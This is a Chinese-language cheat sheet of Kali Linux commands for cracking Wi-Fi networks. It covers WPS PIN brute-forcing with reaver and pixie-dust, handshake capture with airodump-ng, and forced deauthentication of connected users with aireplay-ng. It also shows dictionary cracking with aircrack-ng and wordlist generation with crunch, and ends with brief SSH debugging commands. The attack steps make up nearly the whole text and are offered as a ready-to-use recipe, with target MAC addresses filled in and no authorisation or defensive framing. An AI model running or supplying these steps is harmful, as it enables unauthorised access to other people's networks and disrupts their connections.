--------------------------------------------------------------------
wps pin码穷举破解 成功率高
--------------------------------------------------------------------
root@kali:~# iwconfig   //显示网卡信息
root@kali:~# airmon-ng start wlan0  //将网卡设置成监听模式
root@kali:~# wash -i wlan0mon   //扫描打开wps的路由器lok为No的都可以爆破
root@kali:~# reaver -i wlan0mon -b 00:BD:82:5B:CC:1B -s -n -vv -d 5 -t 5 -c 2   //穷举wps密码
//reaver参数
-b 目标mac
-s 以最小的key爆
-vv 显示更多警告
-d 穷举一次的闲置时间
-t 每次穷举的等待反馈时间（信号越强数值可越小1-5）
-c 目标mac的信道
-p 可设置从多少值开始（如-p 1000 即从1000开始）

root@kali:~# airmon-ng stop wlan0mon //取消监听模式
-----------
root@kei:~# reaver -i wlan0mon -b B0:DF:C1:00:A3:B1 -v --pixie-dust -c 2	//加插件秒破，成功率不高，但速度快

------------------------------------------------------------------
以下为爆力破解 几乎靠运气
------------------------------------------------------------------
root@kali:~# iwconfig   //显示网卡信息
root@kali:~# airmon-ng start wlan0  //将网卡设置成监听模式
root@kei:~# airodump-ng wlan0mon    //扫描附近的路由器（--manufacturer --wps //显示路由器厂商）
root@kei:~# airodump-ng --bssid C4:36:55:76:0D:F5 --ivs -w /root/文档/pj/p -c 1 wlan0mon  //监听路由器获取握手信息（-c为信道，-w为文件名，--ivs为指定保存文件类型。握手信息保存在/root/目录下）
root@kei:~# aireplay-ng -0 2 -a 50:FA:84:63:37:E2 -c DC:0C:5C:8E:F5:AC wlan0mon //新终端窗口,将用户强制踢出路由器以便其重新连接时上一个命令获取握手信息（-0为取消用户授权-5为攻击次数-a为目标路由器mac -c为连接路由器的用户mac)
root@kei:~# aircrack-ng -w /root/文档/mima.txt /root/文档/pj/p-02.ivs // -w为密码文件空格后握手包文件名
root@kali:~# airmon-ng stop wlan0mon //取消监听模式
-------------------------------------------------------------------
密码生成器
-------------------------------------------------------------------
root@kei:~# crunch 8 8 +0123456789 -t GHJ%%%%% -b 100mib -o START //生成（以GHJ开头尾数为数字的密码的）

-------------------------------------------------------------------
ssh服务
----------------------------------------------------------------
root@ka:~# /usr/sbin/sshd -d -p 22	//ssh服务调试可定位问题
root@ka:/etc/ssh# chmod 0600 /etc/ssh/ssh	//设置文件权限

=========================================================

